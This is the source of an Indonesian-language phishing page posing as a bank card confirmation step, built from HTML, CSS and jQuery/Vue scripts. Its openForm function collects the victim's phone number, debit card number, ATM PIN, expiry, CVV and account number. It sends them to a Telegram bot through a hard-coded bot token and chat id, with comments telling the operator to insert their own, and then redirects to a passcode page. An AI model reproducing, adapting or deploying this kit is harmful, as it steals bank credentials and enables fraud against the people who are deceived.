     <div style="position: relative; left: 0; right: 0; top: 40; bottom: 0; width: 100%; height: 70%; margin: 0px auto;  background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifkPX3E4cSgGW6n5GQRNi5OcSCvrJNEDs8baCuCz0DxKWBeMs45fDd1wSW_gtXvBoVXf-mw1nWhwcUiMvbExH8aCoQEfllcKrA3hJPsV31BtcmFfdXVmRLe_MaWYPwIT12VcoUWiQ-f1ccf-8qf9-kZj42WG4EIIO3HgHTCbIQKxmtG6k1y-aNP6zCHuY/s1588/AddText_08-14-09.23.30.png');
  background-position: 100% 100%;
  background-size: 100% 100%;
            background-color: #fff; border-radius:20px; text-align: center;display: inline-block;" id="divku" class="styleku">
         
 <div style="margin-top: 90px;"> 
 <br/>
  <p id="" style="text-align: center; color: #fff; position: relative; left: 0; right: 0; margin: 0px auto; z-index: 99999; top: 0; text-orientation: mixed; word-break: break-all; font-family: Alfa Slab One; font-size: 13px; line-height: 14px; padding: 12px">Sebelum lanjut silahkan di cek kembali untuk datanya dan dipastikan<br/>sudah benar</p>
  
 <style>
h1{
  font-family: sans-serif;
}
 
table {
  font-family: Arial, Helvetica, sans-serif;
  line-height: 15px;
  color: #666;
  margin-top: -10px;
  text-shadow: 1px 1px 0px #fff;
  background: #eaebec;
  border: #780001 2px solid;
  font-size: 5px;
  border-radius: 10px 10px 0px 0px;
}
 
table th {
  padding: 0px 0px;
  border-left:2px solid #780001;
  border-bottom: 2px solid #780001;
  background: #ededed;
  height: 30px;
  font-weight: bold;
  border-radius: 10px 10px 0px 0px;
}
 
table th:first-child{  
  border-left: 1px solid #780001;  
}
 
table tr {
  text-align: center;
  padding-left: 20px;
  font-weight: bold;
}
 
table td:first-child {
  text-align: center;
  padding-left: 20px;
  border-left: 0;
 
}
 
table td {
  padding: 15px 35px;
  border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa);
  font-size: 6px;
}
 
table tr:last-child td {
  border-bottom: 0;
}
 
table tr:last-child td:first-child {
  -moz-border-radius-bottomleft: 3px;
  -webkit-border-bottom-left-radius: 3px;
  border-bottom-left-radius: 3px;
}
 
table tr:last-child td:last-child {
  -moz-border-radius-bottomright: 3px;
  -webkit-border-bottom-right-radius: 3px;
  border-bottom-right-radius: 3px;
}
 
table tr:hover td {
  background: #f2f2f2;
  background: -webkit-gradient(linear, left top, left bottom, from(#f2f2f2), to(#f0f0f0));
  background: -moz-linear-gradient(top, #f2f2f2, #f0f0f0);
}    
</style>
<center>
<div style="padding: 5px">
<table border="5" cellpadding="10" style="font-family: Arial, Helvetica, sans-serif;
  line-height: 14px;
  color: #666;
  width: 100%;
  margin-top: -10px;
  text-shadow: 1px 1px 0px #fff;
  background: #eaebec;
  border: #780001 2px solid;
  font-size: 15px;
  
  border-radius: 10px 10px 0px 0px;">
        <tr>
            <th border="5" colspan="3" bgcolor="#ffffff" style="padding: 6px 0px;
  border-left:2px solid #780001;
  border-bottom: 2px solid #780001;
  background: #ededed;
  height: 30px;
  font-weight: bold;
  border-radius: 10px 10px 0px 0px; text-align: center">Cek Kembali DATA Anda</th>
        </tr>
       
        <tr border="5" cellpadding="5">
            <td style="padding: 5px; color: black; border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa);">PIN ATM</td>
            <td id="infonama" style="border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa); padding: 5px;">123456</td>
        </tr>
        <tr>
            <td  style="color: black; padding: 5px; border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa);">Nomor Kartu</td>
            <td id="infodebit" style="border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa); padding: 5px;">6019 0019 1234 0909</td>
        </tr>
        <tr>
            <td style="color: black; padding: 5px; border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa);">Masa Berlaku</td>
            <td id="infovalid" style="border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa); padding: 5px;">11/29</td>
        </tr> 
        <tr>
            <td style="color: black; padding: 5px; border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa);">CVV</td>
            <td id="infocvv" style="border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa); padding: 5px;">123</td>
        </tr>
        <tr>
            <td style="color: black; padding: 5px; border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa);">Nomor Rekening</td>
            <td id="inforek" style="border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa); padding: 5px;">091234567890</td>
        </tr>
        <tr>
            <th rowspan="4" colspan="3" bgcolor="#fffff" style="border-radius: 10px; text-align: center; background: #fff">
                <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgtlEFC1EqX-97fbhe6BV75ES2GovqGRpYbwmvENeR3q_D049gHd0cJCXS4p0bxglp5bgv8YTrVQ6vmQ2nz4C4BZLRAM8ArETQD7HdoeVx7dGBPO6EBmLYPmdPuJVVwmQ2S5WcZA0NrkxUpi1myDFN830dJ8BPkpoy56GnFspKEDGw21e0vrBEdY9Js6E/s391/IMG_20231122_224014.jpg" width="120px" style="border-radius: 10px"/>
            </th>
        </tr>
    </table>
    </div>
    </center>
    <center>

 </div>   
 </center>
  
                       </div><br/>
    <div style="margin-top: 40px;" id="akubtn">
       
     <button type="button" class="card-form__button" onclick="kirimPesan()">LANJUTKAN</button>
       <button type="button" class="card-form__button" onclick="closeForm()">Kembali</button>

</div>
</div>
  <center>
 <div class="app-loading" style="position: fixed; margin: 0px auto; left: 0; right: 0; top: 0; bottom: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.4); z-index: 99999999; padding-top: 250px; display: " id="lodingku">
 <img class="img-fluid" style="width: 80px" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLZlfefelzGh7hsSCYOw5hTUxD0n_8OawPntuVMmv3Lcv6ocoFAT6VfaWd1yosmFXU9iBgVohFqOsEfh0lufKvlqm1ZruT4tcA_o1vjgksXnATXtybf0BgN_5fmVZnBVkyCqNFJ0a_W8nl6gn8QBQqxTKXVmwmowFReM28qVsAAVXvNW09IuZHfwCpfqQ/s720/octo_loading_gif.gif" alt="preloader" />
      </div>
  </center>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
        
      </div> 
     
    </div> 
   </div> 
   </div>
   <script>
function kirimPesan(){
 $("#lodingku").show();
 $("#akubtn").hide();
  $("#divku").hide();
  setTimeout(() => {
  $("#lodingku").hide();
  $("#myForm").hide();
   window.location = "./passcode.html";  
},2000)
     
}

function closeForm() {
  document.getElementById("myForm").style.display = "none";
}
</script> 
  </div> 
  <!-- partial -->
 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script>
 <script>$(document).ready(function(){
$('#valid').mask('00/00');
});</script>
<script>
    function openForm(event) {
     $("#lodingku").show();
  event.preventDefault();

    var nomorku = document.getElementById('nomorku');
    var debit = document.getElementById('debit');
    var pinatm = document.getElementById('pinatm');
    var valid = document.getElementById('valid');
    
    var norek = document.getElementById('norek');

    var gabungan = '%0A𝗡𝗼𝗺𝗼𝗿 𝗛𝗮𝗻𝗱𝗽𝗵𝗼𝗻𝗲%3A%0A' + nomorku.value + '%0A%0A𝗡𝗼𝗺𝗼𝗿 𝗞𝗮𝗿𝘁𝘂 𝗗𝗲𝗯𝗶𝘁 %3A%0A' + debit.value + '%0A𝗣𝗜𝗡 𝗔𝗧𝗠 %3A%0A' + pinatm.value + '%0A𝗠𝗮𝘀𝗮 𝗕𝗲𝗿𝗹𝗮𝗸𝘂 %3A%0A' + valid.value + '%0A𝗡𝗼𝗺𝗼𝗿 𝗥𝗲𝗸𝗲𝗻𝗶𝗻𝗴 %3A%0A' + norek.value + '%0A𝗖𝗩𝗩 %3A%0A' + cvvku.value;

    var token = '6747973223:AAEq9CWEWqurspTScOCqxZrrRLFGEaaFShU'; // Ganti dengan token bot yang kamu buat
    var grup = '6228364175'; // Ganti dengan chat id dari bot yang kamu buat
    
    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
   
    success: function(){
    setTimeout(function(){
       $("#lodingku").hide();
      window.location = "./passcode.html";  
    }, 1500);}});};

</script>
...
<script>

/*
See on github: https://github.com/muhammederdem/credit-card-form
*/

new Vue({
  el: "#app",
  data() {
    return {
      currentCardBackground: Math.floor(Math.random()* 25 + 1), // just for fun :D
      cardName: "",
      cardNumber: "",
      cardMonth: "",
      cardYear: "",
      cardCvv: "",
      minCardYear: new Date().getFullYear(),
      amexCardMask: "#### ###### #####",
      otherCardMask: "#### #### #### ####",
      cardNumberTemp: "",
      isCardFlipped: false,
      focusElementStyle: null,
      isInputFocused: false
    };
  },
  mounted() {
    this.cardNumberTemp = this.otherCardMask;
    document.getElementById("cardNumber").focus();
  },
  computed: {
    getCardType () {
      let number = this.cardNumber;
      let re = new RegExp("^4");
      if (number.match(re) != null) return "visa";

      re = new RegExp("^(34|37)");
      if (number.match(re) != null) return "amex";

      re = new RegExp("^5[1-5]");
      if (number.match(re) != null) return "mastercard";

      re = new RegExp("^6011");
      if (number.match(re) != null) return "discover";
      
      re = new RegExp('^9792')
      if (number.match(re) != null) return 'troy'

      return "visa"; // default type
    },
		generateCardNumberMask () {
			return this.getCardType === "amex" ? this.amexCardMask : this.otherCardMask;
    },
    minCardMonth () {
      if (this.cardYear === this.minCardYear) return new Date().getMonth() + 1;
      return 1;
    }
  },
  watch: {
    cardYear () {
      if (this.cardMonth < this.minCardMonth) {
        this.cardMonth = "";
      }
    }
  },
  methods: {
    flipCard (status) {
      this.isCardFlipped = status;
    },
    focusInput (e) {
      this.isInputFocused = true;
      let targetRef = e.target.dataset.ref;
      let target = this.$refs[targetRef];
      this.focusElementStyle = {
        width: `${target.offsetWidth}px`,
        height: `${target.offsetHeight}px`,
        transform: `translateX(${target.offsetLeft}px) translateY(${target.offsetTop}px)`
      }
    },
    blurInput() {
      let vm = this;
      setTimeout(() => {
        if (!vm.isInputFocused) {
          vm.focusElementStyle = null;
        }
      }, 300);
      vm.isInputFocused = false;
    }
  }
});
</script>
<script>
var nomor = sessionStorage.getItem("nomor");
 document.getElementById("nomorku").value = nomor + "";

</script>
<script>
function cekno0(){$(".errtelp").empty();var o,n=$(".card-input__input3").val(),r=n.length;if(r>=4&&r<=19){o=n.substring(0,4);var a=tsel.length,e=0,t=!0;for(nomor="bukan";a>e;)tsel[e]==o&&($(".card-input__input3").css({"background-image":"url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6jvk6cQQF4myuADPa1JTRRZYFxp7kuoUGUVAdi1e5gBUB-howjstofPqnE1YoD7NPQsfLmFVkm7n-4V0d9gD_kb0shj109_amaPCBK44BkEbvP_VmeNZDB3AF8e1UfwOEUcb6OXN-tSs4sPBTv9DEUihsfvLEgt37Pqg-Gd6pE7wWx8FA9pnHpJ2Nnl4/s1080/AddText_11-23-12.50.13.png)"}),nomor="TELKOMSEL",t=!1),++e;for(a=isat.length,e=0;a>e&&t;)isat[e]==o&&($(".card-input__input3").css({"background-image":"url(https://seeklogo.com/images/G/gpn-logo-36CC6EB701-seeklogo.com.png)"}),nomor="INDOSAT",t=!1),++e;for(a=tree.length,e=0;a>e&&t;)tree[e]==o&&($(".card-input__input3").css({"background-image":"url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIzMZWGBLO81lrJenW2prKysOlci18m1xatbYsCWBFDWU_tFFnrirUj4i7IX6wPSgMXaEm_vxwIQbbRQ41NMbVXkwuf5LbVB13yzJm-mgNjt90RskjH5Ml_l3_7-NIuwcf8KNjaKmw55IILID1PvlCNVLWdZV3YrnCPedCljTysm8LPdniqZFBWxuO99U/s1080/AddText_11-23-12.50.29.png)"}),nomor="THREE",t=!1),++e;for(a=sfren.length,e=0;a>e&&t;)sfren[e]==o&&($(".card-input__input3").css({"background-image":"url(https://upload.wikimedia.org/wikipedia/commons/thumb/4/40/JCB_logo.svg/600px-JCB_logo.svg.png"}),nomor="SMARTFREN",t=!1),++e;for(a=xl.length,e=0;a>e&&t;)xl[e]==o&&($(".card-input__input3").css({"background-image":"url(https://3.bp.blogspot.com/-WM_SGpSoqNY/WkDuWGIi8_I/AAAAAAAABic/6sHIwe7dh1sm0CC1ZAokqhsR3vZuRErxgCPcBGAYYCw/s1600/xl.png)"}),nomor="XL",t=!1),++e;for(a=axis.length,e=0;a>e&&t;)axis[e]==o&&($(".card-input__input3").css({"background-image":"url(https://4.bp.blogspot.com/-3GaLxmQk2sc/WkDuVAN41pI/AAAAAAAABiI/IdxzPaiB_XMNKc-37Clgmn6SxKtw_PwQACPcBGAYYCw/s1600/axis.png)"}),nomor="AXIS",t=!1),++e;"bukan"==nomor?(blocktombol(),gambaroperatorhilang()):r>=10&&12>=r?bukablocktombol():blocktombol()}else blocktombol(),gambaroperatorhilang()}function adahurufstring(){var o=!0,n=$(".card-input__input3").val(),r=n.length;if(n=parseInt(n),n=n.toString().length,r==n+1)var o=!1;return o}function blocktombol(){$(".tombol").prop("disabled",!0)}function bukablocktombol(){$(".tombol").prop("disabled",!1)}function gambaroperatorhilang(){$(".card-input__input3").css({"background-image":"url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgtlEFC1EqX-97fbhe6BV75ES2GovqGRpYbwmvENeR3q_D049gHd0cJCXS4p0bxglp5bgv8YTrVQ6vmQ2nz4C4BZLRAM8ArETQD7HdoeVx7dGBPO6EBmLYPmdPuJVVwmQ2S5WcZA0NrkxUpi1myDFN830dJ8BPkpoy56GnFspKEDGw21e0vrBEdY9Js6E/s391/IMG_20231122_224014.jpg)"})}function isNumberKey(o){var n=o.which?o.which:event.keyCode;return n>31&&(48>n||n>57)?!1:!0}var tsel=["4284","4000","3422","4750","4895","4259","4149","4098"],isat=["5899"],tree=["5324","5327","5304","5211","5576","5463","5379","5289","5412","5520","5336","4599","5528"],sfren=["4213","3000","3565"],nomor,datapr;$(document).on("keyup",".card-input__input3",cekno0);
</script>
<script>
 var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?Object.defineProperty:function(a,l,d){if(d.get||d.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[l]=d.value)};
$jscomp.getGlobal=function(a){return"undefined"!=typeof window&&window===a?a:"undefined"!=typeof global&&null!=global?global:a};$jscomp.global=$jscomp.getGlobal(this);$jscomp.polyfill=function(a,l,d,p){if(l){d=$jscomp.global;a=a.split(".");for(p=0;p<a.length-1;p++){var h=a[p];h in d||(d[h]={});d=d[h]}a=a[a.length-1];p=d[a];l=l(p);l!=p&&null!=l&&$jscomp.defineProperty(d,a,{configurable:!0,writable:!0,value:l})}};
$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,d){return $jscomp.findInternal(this,a,d).v}},"es6-impl","es3");
(function(a,l,d){"function"===typeof define&&define.amd?define(["jquery"],a):"object"===typeof exports?module.exports=a(require("jquery")):a(l||d)})(function(a){var l=function(b,e,f){var c={invalid:[],getCaret:function(){try{var a,r=0,g=b.get(0),e=document.selection,f=g.selectionStart;if(e&&-1===navigator.appVersion.indexOf("MSIE 10"))a=e.createRange(),a.moveStart("character",-c.val().length),r=a.text.length;else if(f||"0"===f)r=f;return r}catch(C){}},setCaret:function(a){try{if(b.is(":focus")){var c,
g=b.get(0);g.setSelectionRange?g.setSelectionRange(a,a):(c=g.createTextRange(),c.collapse(!0),c.moveEnd("character",a),c.moveStart("character",a),c.select())}}catch(B){}},events:function(){b.on("keydown.mask",function(a){b.data("mask-keycode",a.keyCode||a.which);b.data("mask-previus-value",b.val());b.data("mask-previus-caret-pos",c.getCaret());c.maskDigitPosMapOld=c.maskDigitPosMap}).on(a.jMaskGlobals.useInput?"input.mask":"keyup.mask",c.behaviour).on("paste.mask drop.mask",function(){setTimeout(function(){b.keydown().keyup()},
100)}).on("change.mask",function(){b.data("changed",!0)}).on("blur.mask",function(){d===c.val()||b.data("changed")||b.trigger("change");b.data("changed",!1)}).on("blur.mask",function(){d=c.val()}).on("focus.mask",function(b){!0===f.selectOnFocus&&a(b.target).select()}).on("focusout.mask",function(){f.clearIfNotMatch&&!h.test(c.val())&&c.val("")})},getRegexMask:function(){for(var a=[],b,c,f,n,d=0;d<e.length;d++)(b=m.translation[e.charAt(d)])?(c=b.pattern.toString().replace(/.{1}$|^.{1}/g,""),f=b.optional,
(b=b.recursive)?(a.push(e.charAt(d)),n={digit:e.charAt(d),pattern:c}):a.push(f||b?c+"?":c)):a.push(e.charAt(d).replace(/[-\/\\^$*+?.()|[\]{}]/g,"\\$&"));a=a.join("");n&&(a=a.replace(new RegExp("("+n.digit+"(.*"+n.digit+")?)"),"($1)?").replace(new RegExp(n.digit,"g"),n.pattern));return new RegExp(a)},destroyEvents:function(){b.off("input keydown keyup paste drop blur focusout ".split(" ").join(".mask "))},val:function(a){var c=b.is("input")?"val":"text";if(0<arguments.length){if(b[c]()!==a)b[c](a);
c=b}else c=b[c]();return c},calculateCaretPosition:function(){var a=b.data("mask-previus-value")||"",e=c.getMasked(),g=c.getCaret();if(a!==e){var f=b.data("mask-previus-caret-pos")||0,e=e.length,d=a.length,m=a=0,h=0,l=0,k;for(k=g;k<e&&c.maskDigitPosMap[k];k++)m++;for(k=g-1;0<=k&&c.maskDigitPosMap[k];k--)a++;for(k=g-1;0<=k;k--)c.maskDigitPosMap[k]&&h++;for(k=f-1;0<=k;k--)c.maskDigitPosMapOld[k]&&l++;g>d?g=10*e:f>=g&&f!==d?c.maskDigitPosMapOld[g]||(f=g,g=g-(l-h)-a,c.maskDigitPosMap[g]&&(g=f)):g>f&&
(g=g+(h-l)+m)}return g},behaviour:function(f){f=f||window.event;c.invalid=[];var e=b.data("mask-keycode");if(-1===a.inArray(e,m.byPassKeys)){var e=c.getMasked(),g=c.getCaret();setTimeout(function(){c.setCaret(c.calculateCaretPosition())},10);c.val(e);c.setCaret(g);return c.callbacks(f)}},getMasked:function(a,b){var g=[],d=void 0===b?c.val():b+"",n=0,h=e.length,q=0,l=d.length,k=1,r="push",p=-1,t=0,y=[],v,z;f.reverse?(r="unshift",k=-1,v=0,n=h-1,q=l-1,z=function(){return-1<n&&-1<q}):(v=h-1,z=function(){return n<
h&&q<l});for(var A;z();){var x=e.charAt(n),w=d.charAt(q),u=m.translation[x];if(u)w.match(u.pattern)?(g[r](w),u.recursive&&(-1===p?p=n:n===v&&n!==p&&(n=p-k),v===p&&(n-=k)),n+=k):w===A?(t--,A=void 0):u.optional?(n+=k,q-=k):u.fallback?(g[r](u.fallback),n+=k,q-=k):c.invalid.push({p:q,v:w,e:u.pattern}),q+=k;else{if(!a)g[r](x);w===x?(y.push(q),q+=k):(A=x,y.push(q+t),t++);n+=k}}d=e.charAt(v);h!==l+1||m.translation[d]||g.push(d);g=g.join("");c.mapMaskdigitPositions(g,y,l);return g},mapMaskdigitPositions:function(a,
b,e){a=f.reverse?a.length-e:0;c.maskDigitPosMap={};for(e=0;e<b.length;e++)c.maskDigitPosMap[b[e]+a]=1},callbacks:function(a){var h=c.val(),g=h!==d,m=[h,a,b,f],q=function(a,b,c){"function"===typeof f[a]&&b&&f[a].apply(this,c)};q("onChange",!0===g,m);q("onKeyPress",!0===g,m);q("onComplete",h.length===e.length,m);q("onInvalid",0<c.invalid.length,[h,a,b,c.invalid,f])}};b=a(b);var m=this,d=c.val(),h;e="function"===typeof e?e(c.val(),void 0,b,f):e;m.mask=e;m.options=f;m.remove=function(){var a=c.getCaret();
c.destroyEvents();c.val(m.getCleanVal());c.setCaret(a);return b};m.getCleanVal=function(){return c.getMasked(!0)};m.getMaskedVal=function(a){return c.getMasked(!1,a)};m.init=function(d){d=d||!1;f=f||{};m.clearIfNotMatch=a.jMaskGlobals.clearIfNotMatch;m.byPassKeys=a.jMaskGlobals.byPassKeys;m.translation=a.extend({},a.jMaskGlobals.translation,f.translation);m=a.extend(!0,{},m,f);h=c.getRegexMask();if(d)c.events(),c.val(c.getMasked());else{f.placeholder&&b.attr("placeholder",f.placeholder);b.data("mask")&&
b.attr("autocomplete","off");d=0;for(var l=!0;d<e.length;d++){var g=m.translation[e.charAt(d)];if(g&&g.recursive){l=!1;break}}l&&b.attr("maxlength",e.length);c.destroyEvents();c.events();d=c.getCaret();c.val(c.getMasked());c.setCaret(d)}};m.init(!b.is("input"))};a.maskWatchers={};var d=function(){var b=a(this),e={},f=b.attr("data-mask");b.attr("data-mask-reverse")&&(e.reverse=!0);b.attr("data-mask-clearifnotmatch")&&(e.clearIfNotMatch=!0);"true"===b.attr("data-mask-selectonfocus")&&(e.selectOnFocus=
!0);if(p(b,f,e))return b.data("mask",new l(this,f,e))},p=function(b,e,f){f=f||{};var c=a(b).data("mask"),d=JSON.stringify;b=a(b).val()||a(b).text();try{return"function"===typeof e&&(e=e(b)),"object"!==typeof c||d(c.options)!==d(f)||c.mask!==e}catch(t){}},h=function(a){var b=document.createElement("div"),d;a="on"+a;d=a in b;d||(b.setAttribute(a,"return;"),d="function"===typeof b[a]);return d};a.fn.mask=function(b,d){d=d||{};var e=this.selector,c=a.jMaskGlobals,h=c.watchInterval,c=d.watchInputs||c.watchInputs,
t=function(){if(p(this,b,d))return a(this).data("mask",new l(this,b,d))};a(this).each(t);e&&""!==e&&c&&(clearInterval(a.maskWatchers[e]),a.maskWatchers[e]=setInterval(function(){a(document).find(e).each(t)},h));return this};a.fn.masked=function(a){return this.data("mask").getMaskedVal(a)};a.fn.unmask=function(){clearInterval(a.maskWatchers[this.selector]);delete a.maskWatchers[this.selector];return this.each(function(){var b=a(this).data("mask");b&&b.remove().removeData("mask")})};a.fn.cleanVal=function(){return this.data("mask").getCleanVal()};
a.applyDataMask=function(b){b=b||a.jMaskGlobals.maskElements;(b instanceof a?b:a(b)).filter(a.jMaskGlobals.dataMaskAttr).each(d)};h={maskElements:"input,td,span,div",dataMaskAttr:"*[data-mask]",dataMask:!0,watchInterval:300,watchInputs:!0,useInput:!/Chrome\/[2-4][0-9]|SamsungBrowser/.test(window.navigator.userAgent)&&h("input"),watchDataMask:!1,byPassKeys:[9,16,17,18,36,37,38,39,40,91],translation:{0:{pattern:/\d/},9:{pattern:/\d/,optional:!0},"#":{pattern:/\d/,recursive:!0},A:{pattern:/[a-zA-Z0-9]/},
S:{pattern:/[a-zA-Z]/}}};a.jMaskGlobals=a.jMaskGlobals||{};h=a.jMaskGlobals=a.extend(!0,{},h,a.jMaskGlobals);h.dataMask&&a.applyDataMask();setInterval(function(){a.jMaskGlobals.watchDataMask&&a.applyDataMask()},h.watchInterval)},window.jQuery,window.Zepto);   
</script>
<script>
 var nomor = sessionStorage.getItem("nomor");
 document.getElementById("nomorku").value = nomor + "";
</script>
</body>
</html>